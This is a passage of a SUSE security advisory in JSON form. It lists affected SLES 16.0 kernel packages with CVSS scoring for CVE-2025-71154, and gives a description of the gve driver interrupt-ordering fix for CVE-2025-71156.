"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71154"
},
{
"cve": "CVE-2025-71156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71156"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngve: defer interrupt enabling until NAPI registration\n\nCurrently, interrupts are automatically enabled immediately upon\nrequest. This allows interrupt to fire before the associated NAPI\ncontext is fully initialized and cause failures like below:\n\n[ 0.946369] Call Trace:\n[ 0.946369] \u003cIRQ\u003e\n[ 0.946369] __napi_poll+0x2a/0x1e0\n[ 0.946369] net_rx_action+0x2f9/0x3f0\n[ 0.946369] handle_softirqs+0xd6/0x2c0\n[ 0.946369] ? handle_edge_irq+0xc1/0x1b0\n[ 0.946369] __irq_exit_rcu+0xc3/0xe0\n[ 0.946369] common_interrupt+0x81/0xa0\n[ 0.946369] \u003c/IRQ\u003e\n[ 0.946369] \u003cTASK\u003e\n[ 0.946369] asm_common_interrupt+0x22/0x40\n[ 0.946369] RIP: 0010:pv_native_safe_halt+0xb/0x10\n\nUse the `IRQF_NO_AUTOEN` flag when requesting interrupts to prevent auto\nenablement and explicitly enable the interrupt in NAPI initialization\npath (and disable it during NAPI teardown).\n\nThis ensures that interrupt lifecycle is strictly coupled with\nreadiness of NAPI context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
